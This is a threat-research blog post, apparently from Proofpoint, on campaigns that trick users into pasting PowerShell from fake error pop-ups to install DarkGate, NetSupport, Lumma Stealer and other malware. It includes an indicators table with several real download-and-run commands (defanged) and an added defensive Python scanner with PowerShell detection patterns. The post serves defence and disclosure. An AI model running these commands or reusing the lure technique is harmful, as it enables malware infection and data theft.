URL: https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn
FROM CLIPBOARD TO COMPROMISE: A POWERSHELL SELF-PWN

June 17, 2024 Tommy Madjar, Dusty Miller, Selena Larson and the Proofpoint
Threat Research Team


KEY FINDINGS 

 * Proofpoint researchers identified an increasingly popular technique
   leveraging unique social engineering to run PowerShell and install malware.
 * Researchers observed TA571 and the ClearFake activity cluster use this
   technique.
 * Although the attack chain requires significant user interaction to be
   successful, the social engineering is clever enough to present someone with
   what looks like a real problem and solution simultaneously, which may prompt
   a user to take action without considering the risk.


OVERVIEW 

Proofpoint has observed an increase in a technique leveraging unique social
engineering that directs users to copy and paste malicious PowerShell scripts to
infect their computers with malware. Threat actors including initial access
broker TA571 and at least one fake update activity set are using this method to
deliver malware including DarkGate, Matanbuchus, NetSupport, and various
information stealers.  

Whether the initial campaign begins via malspam or is delivered via web browser
injects, the technique is similar. Users are shown a popup textbox suggesting
that an error occurred when trying to open the document or webpage, along with
instructions to copy and paste a malicious script into the PowerShell terminal
or the Windows Run dialog box, which eventually runs the script via PowerShell.

Proofpoint has observed TA571 using this technique as early as 1 March 2024, the
ClearFake cluster using it in early April, and both clusters using it in early
June.


CAMPAIGN DETAILS 

CLEARFAKE EXAMPLE 

Our researchers first observed this technique with the ClearFake campaign in
early April and we have observed it used in every ClearFake campaign since then.
ClearFake is a fake browser update activity cluster that compromises legitimate
websites with malicious HTML and JavaScript.  

In observed campaigns, when a user visited a compromised website, the injection
caused the website to load a malicious script hosted on the blockchain via
Binance’s Smart Chain contracts, a technique known as "EtherHiding". The initial
script then loaded a second script from a domain that used Keitaro TDS for
filtering. If this second script loaded and passed various checks, and if the
victim continued to browse the website, they were presented with a fake warning
overlay on the compromised website. This warning instructed them to install a
"root certificate" to view the website correctly.  



Malicious fake warning instructing recipients to copy a PowerShell script and
run it in the PowerShell Terminal. 

The message included instructions to click a button to copy a PowerShell script
and then provided steps on how to manually run this script on the victim's
computer. If the instructions were followed, the user executed the PowerShell by
pasting it into the PowerShell command line interface window.  

In campaigns in May, we observed the following chain. The script performed
various functions, including flushing the DNS cache, clearing the clipboard
content, displaying a decoy message to the user, and downloading a remote
PowerShell script and executing it in memory. The second PowerShell script was
essentially used to download yet another PowerShell script. This third
PowerShell script obtained system temperatures via WMI and, if no temperature
was returned, as is the case in many virtual environments and sandboxes, exited.
If it continued, it led to a fourth, AES-encrypted PowerShell script that
downloaded a file named "data.zip", extracted its contents, found and executed
any .exe files, and then reported back to the ClearFake C2 that the installation
was complete.

The threat actor used ZIP’s ability to contain any executable and bundled
various legitimate, signed executables that side-loaded a trojanized DLL. This
DLL used DOILoader (also known as IDAT Loader or HijackLoader) to load Lumma
Stealer from an encrypted file, also included in the downloaded ZIP file. 

Lumma Stealer then, in addition to performing the stealer activities, downloaded
three distinctive payloads: 

 * am.exe – Amadey Loader
 * ma.exe – A downloader that downloaded and ran the XMRig cryptocurrency miner
   with a specific configuration
 * cl.exe – A clipboard hijacker designed to replace cryptocurrency addresses in
   the clipboard so that the victim transfers cryptocurrency to a threat
   actor-controlled address instead of the intended one

Amadey was observed to download other payloads, for example a Go-based malware
believed to be JaskaGO. This means that in total, five distinct malware families
could be executed just by running the one initial PowerShell script. 



Example ClearFake attack chain.  

THE CURIOUS CASE OF CLICKFIX 

In mid-April 2024, researchers found compromised sites containing an inject
leading to an iframe on pley[.]es. This iframe was shown as an overlay error
message claiming that a faulty browser update needed to be fixed. Researchers
dubbed this activity cluster ClickFix. 
 


ClickFix error message per 11 May 2024. 

The error message asked the victim to open "Windows PowerShell (Admin)" (which
opens a UAC prompt) and then right-click to paste the code. If this was done,
PowerShell ran another remote PowerShell script that downloaded and ran an
executable, eventually leading to Vidar Stealer. However, just a few days after
discovery, the payload domain used in the PowerShell was taken offline. Thus,
although the error was still displayed on compromised websites, it could no
longer lead to an infection.

After a few days in this semi-functional state, on 15 May 2024 the custom
content of the iframe was replaced with the ClearFake inject, and it was still
serving this inject in early June 2024. As the pley[.]es domain itself appears to
be compromised, it is unclear whether the two activity sets, ClearFake and
ClickFix, started to work with each other, or whether the ClearFake actor
re-compromised the iframe and replaced the code with its own content.



Extract from custom iframe content on 11 May 2024. 



iframe content as on 07 June 2024. 

TA571 EXAMPLES 

Proofpoint first observed TA571’s use of this technique in a campaign on 01
March 2024. The campaign included over 100,000 messages and targeted thousands
of organizations globally.  



TA571 email lure.  

In this campaign, emails contained an HTML attachment that displayed a page
resembling Microsoft Word.  

The page also displayed an error message that said the “‘Word Online’ extension
is not installed,” and presented two options to continue: “How to fix” and
“Auto-fix”. 



HTML attachment containing instructions on how to copy and paste PowerShell that
leads to the installation of malware. 

Clicking the "How to fix" button copied a base64-encoded PowerShell command to
the computer's clipboard, and the message on the page changed to instruct the
target to open a PowerShell terminal and right-click the console window.
Right-clicking a terminal window pasted the content of the clipboard and
executed the PowerShell. Proofpoint observed two different PowerShell commands in
these files: one that downloaded and executed an MSI file, and one that
downloaded and executed a VBS script.

If the “Auto-fix” button was clicked, the search-ms protocol displayed a similar
WebDAV-hosted “fix.msi” or “fix.vbs” in Windows Explorer. 

When executed, the MSI ran a bundled DLL, “Inkpad3.dll”, with the LOLBAS command
“msiexec -z”. This command ran the DllUnregisterServer function of the DLL,
which dropped and executed another DLL, “Inkpad_honeymoon.msp”. This led to the
installation of Matanbuchus. If the VBS was executed, it used PowerShell to
download and execute DarkGate. 

Proofpoint observed TA571 use similar attack chains in campaigns throughout the
spring, using various visual lures and alternating between instructing the
victim to open the PowerShell terminal and instructing them to use the Run dialog
box by pressing the Windows key+R. The actor also removed wording that refers to
copy/paste, exploiting the fact that the victim does not need to know that
something has been copied to the clipboard. Some recent examples:

On 27 May 2024, TA571 used an HTML attachment that appeared to display a
document hosted on OneDrive and contained a fake error message.  



HTML attachment purporting to be a document hosted on OneDrive containing a “How
to fix” button.  

If the “How to fix” button was clicked, it copied a PowerShell script to the
clipboard and provided instructions to the user on how to run it. This attack
chain ultimately led to the installation of DarkGate malware.   

TA571 continues to modify and update its lures and attack chains while using the
PowerShell clipboard technique. On 28 May 2024, Proofpoint identified a TA571
campaign using HTML attachments with a different error message. Notably, this
campaign instructed the victim to click the "Fix" button to "install the root
certificate", the same language that ClearFake error messages used. In this
campaign, TA571 asked the victim to use the Run dialog box rather than the
PowerShell terminal to run the malicious script. The campaign contained at least
two different command lines running different PowerShell scripts: one leading to
DarkGate via a downloaded HTA file that ran another PowerShell script, and one
leading to NetSupport RAT via a downloaded ZIP file.

In most of the campaigns, TA571 also padded the HTML files with various random
content, creating semi-unique hashes for the attachments. 



Example of the new TA571 lure containing similar language to ClearFake. 


COMMON TECHNIQUES 

In all cases, whether via the fake updates or the HTML attachments, the
malicious PowerShell/CMD script is copied to the clipboard by browser-side
JavaScript of the kind commonly used on legitimate sites as well. The malicious
content is stored in various places in the HTML/website and encoded in several
ways, such as double-Base64, reversed Base64, or even clear text inside various
elements and functions. The legitimate use of such JavaScript, the many ways of
storing the malicious code, and the fact that the victim manually runs the code
without any direct association with a file all make these threats difficult to
detect. Because antivirus software and EDRs have difficulty inspecting clipboard
content, detection and blocking need to be in place before the malicious
HTML/site is presented to the victim.
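A defender-side illustration of the detection problem this section describes. This is an added example, not Proofpoint's code or any product's logic: it scans an HTML attachment for a clipboard-write call paired with a PowerShell command stored in clear text, double-Base64 or reversed Base64, and only blocks when both are present. The `decode` function and `data-c` attribute in the fixtures are hypothetical, and the sample command is a harmless constructed one, not a campaign artefact.

```python
"""Heuristic scan of an HTML attachment for a 'copy this fix' lure: a clipboard
write paired with a PowerShell command stored in clear text, double-Base64 or
reversed Base64. Added example; not Proofpoint's code or any product's logic."""
import base64
import binascii
import re
from typing import List, Optional, Tuple

# Clipboard-write calls. Legitimate "copy" buttons use the same APIs, so a hit
# only matters when an embedded PowerShell command is found as well.
CLIPBOARD_API_RE = re.compile(
    r"navigator\.clipboard\.writeText|execCommand\(\s*['\"]copy['\"]\s*\)"
    r"|clipboardData\.setData", re.IGNORECASE)
# Tokens present in the observed clipboard payloads (see the IOC table).
PS_KEYWORD_RE = re.compile(
    r"\b(?:powershell|invoke-webrequest|invoke-expression|start-process"
    r"|expand-archive|set-clipboard|mshta)\b", re.IGNORECASE)
# Runs of the Base64 alphabet long enough to hold a command; padding may sit at
# either end because some payloads are stored reversed.
B64_RE = re.compile(r"={0,2}[A-Za-z0-9+/]{40,}={0,2}")


def _try_b64(s: str) -> Optional[str]:
    """Decode one Base64 layer to printable ASCII, or None; padding is re-derived
    so reversed or unpadded candidates decode as well."""
    s = s.strip("=")
    s += "=" * (-len(s) % 4)
    try:
        raw = base64.b64decode(s, validate=True)
    except (binascii.Error, ValueError):
        return None
    if all(32 <= b < 127 or b in (9, 10, 13) for b in raw):
        return raw.decode("ascii")
    return None  # binary garbage, e.g. a non-reversed blob read backwards

def decode_layers(blob: str, max_depth: int = 3) -> List[Tuple[str, str]]:
    """Peel up to max_depth Base64 layers off blob, trying each layer as-is and
    reversed; return every layer that decoded to text as (chain, text)."""
    layers: List[Tuple[str, str]] = []
    frontier = [(blob, "")]
    for _ in range(max_depth):
        next_frontier = []
        for s, chain in frontier:
            for label, candidate in (("b64", s), ("rev+b64", s[::-1])):
                text = _try_b64(candidate)
                if text is None:
                    continue
                new_chain = f"{chain}>{label}" if chain else label
                layers.append((new_chain, text))
                if B64_RE.fullmatch(text.strip()):  # still encoded: go deeper
                    next_frontier.append((text.strip(), new_chain))
        frontier = next_frontier
        if not frontier:
            break
    return layers

def scan_html(html: str) -> List[Tuple[str, str]]:
    """Return (reason, evidence) pairs: 'clipboard-write',
    'powershell-cleartext' and 'powershell-encoded:<chain>'."""
    findings: List[Tuple[str, str]] = []
    hit = CLIPBOARD_API_RE.search(html)
    if hit:
        findings.append(("clipboard-write", hit.group(0)))
    hit = PS_KEYWORD_RE.search(html)
    if hit:
        findings.append(("powershell-cleartext", hit.group(0)))
    for blob in B64_RE.findall(html):
        for chain, text in decode_layers(blob):
            if PS_KEYWORD_RE.search(text):
                findings.append((f"powershell-encoded:{chain}", text[:80]))
                break
    return findings

def verdict(html: str) -> str:
    """'block': clipboard write plus PowerShell (clear or encoded); 'review':
    PowerShell alone; 'allow': neither, or a plain copy button."""
    kinds = {reason.split(":")[0] for reason, _ in scan_html(html)}
    powershell = kinds - {"clipboard-write"}
    if powershell and "clipboard-write" in kinds:
        return "block"
    return "review" if powershell else "allow"

def _b64(s: str) -> str:
    return base64.b64encode(s.encode()).decode()

# Constructed samples, not campaign artefacts. The command is harmless; only the
# storage pattern (data attribute + clipboard write on click) mimics the lures.
# `decode` and `data-c` are hypothetical names.
SAMPLE_CMD = "powershell -NoProfile -Command Write-Host 'constructed sample'"
LURE_DOUBLE_B64 = (  # TA571-style error text, command stored double-Base64
    "<p>The 'Word Online' extension is not installed.</p>"
    '<button data-c="' + _b64(_b64(SAMPLE_CMD)) + '" '
    'onclick="navigator.clipboard.writeText(decode(this.dataset.c))">How to fix</button>')
LURE_REVERSED_B64 = (  # same command stored as reversed Base64
    '<button data-c="' + _b64(SAMPLE_CMD)[::-1] + '" '
    'onclick="navigator.clipboard.writeText(decode(this.dataset.c))">Fix</button>')
BENIGN_COPY_BUTTON = (  # legitimate copy button, no PowerShell anywhere
    "<pre id='s'>git clone https://example.invalid/repo.git</pre>"
    '<button onclick="navigator.clipboard.writeText('
    "document.getElementById('s').textContent)\">Copy</button>")
```

`verdict()` returns block for both constructed lures and allow for the plain copy button, while a PowerShell command with no clipboard write is reported as review.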

As for the difference between asking the victim to run the malicious code via
the PowerShell terminal or via the Run dialog box, each approach has trade-offs.
With the PowerShell terminal, the user must perform more steps to open it;
however, once there, a single right-click is enough for the code to be pasted
and executed automatically, without giving the victim a chance to review it
first. With the Run dialog box, the whole process can be done with four
clicks/key combinations: click the button, Ctrl+R to open the dialog, Ctrl+V to
paste the code, and Enter to run it. However, with this method the victim might
have second thoughts on seeing the code being pasted and might press Cancel
instead of running it.


ATTRIBUTION 

TA571 is a spam distributor that sends high-volume email campaigns to deliver
and install a variety of malware for its cybercriminal customers, depending on
the subsequent operator's objectives. Proofpoint assesses with high confidence
that TA571 infections can lead to ransomware.

ClearFake is not currently attributed to a tracked threat actor.  

While it’s clear that both actors are borrowing ideas from each other,
Proofpoint does not associate them with each other in any other way. 


CONCLUSION 

This attack chain requires significant user interaction to be successful. The
social engineering in the fake error messages is clever and purports to be an
authoritative notification coming from the operating system. It also provides
both the problem and a solution so that a viewer may take prompt action without
pausing to consider the risk. The attack chain is unique and aligns with the
overall trend Proofpoint has observed of cybercriminal threat actors adopting
new, varied, and increasingly creative attack chains – including improving
social engineering, nested PowerShell, and the use of WebDAV and SMB – to enable
malware delivery.  

Organizations should train users to identify the activity and report suspicious
activity to their security teams. This is very specific training but can easily
be integrated into an existing user training program.  


EMERGING THREATS SIGNATURES

The Emerging Threats ruleset contains detections for the malware identified in
these campaigns.  


EXAMPLE INDICATORS OF COMPROMISE  

The following is not an exhaustive list of IOCs, but a sample observed in recent
campaigns. 

Indicator | Description | Date Observed
--- | --- | ---
rechtsanwalt@ra-silberkuhl[.]com | TA571 campaign reply-to email | 28 May 2024
9701fec71e5bbec912f69c8ed63ffb6dba21b9cca7e67da5d60a72139c1795d1 | TA571 HTML Attachment Example Hash | 28 May 2024
hxxps://cdn3535[.]shop/1[.]zip | TA571 clipboard payload (NetSupport RAT) | 28 May 2024
hxxps://lashakhazhalia86dancer[.]com/c[.]txt | TA571 clipboard payload (DarkGate) | 28 May 2024
hxxp://languangjob[.]com/pandstvx | TA571 HTA payload (DarkGate) | 28 May 2024
hxxp://languangjob[.]com/pandstvx | TA571 PowerShell payload (DarkGate) | 28 May 2024
cmd /c start /min powershell invoke-webrequest -uri hxxps://lashakhazhalia86dancer[.]com/c.txt -outfile c:\users\public\default.hta; start-process c:\users\public\default.hta; | TA571 Clipboard to DarkGate | 28 May 2024
cmd /c start /min powershell $st='c:\\users\\public';$om=$st+'\\start.zip';$ps=$st+'\\client\\client32.exe';invoke-webrequest -uri hxxps://cdn3535[.]shop/1.zip -outfile $om;expand-archive $om $st; start-process $ps;Set-Clipboard -Value ' ';exit; | TA571 Clipboard to NetSupport | 28 May 2024
07e0c15adc6fcf6096dd5b0b03c20145171c00afe14100468f18f01876457c80 | TA571 HTML Attachment Example Hash | 27 May 2024
hxxps://kostumn1[.]ilabserver[.]com/1.zip | TA571 PowerShell Payload URL | 27 May 2024
91.222.173[.]113 | DarkGate C2 | 27 May 2024
hxxp://mylittlecabbage[.]net/qhsddxna | TA571 Payload URL | 17 May 2024
hxxp://mylittlecabbage[.]net/xcdttafq | TA571 Payload URL | 17 May 2024
hxxps://jenniferwelsh[.]com/header.png | TA571 Payload URL | 17 May 2024
cmd /c start /min powershell $Id = 'c:\users\public\or.hta';invoke-webrequest -uri hxxps://jenniferwelsh[.]com/header.png -outfile $Id;start-process $Id;Set-Clipboard -Value ' ';exit;== | TA571 Clipboard to DarkGate | 17 May 2024
mylittlecabbage[.]net | DarkGate C2 | 17 May 2024
hxxps://rtattack[.]baqebei1[.]online/df/tt | ClearFake PowerShell Payload | 14 May 2024
hxxps://oazevents[.]com/loader[.]html | ClickFix PowerShell Payload URL | 11 May 2024
11909c0262563f29d28312baffb7ff027f113512c5a76bab7c5870f348ff778f | TA571 HTML Attachment Example Hash | 1 March 2024
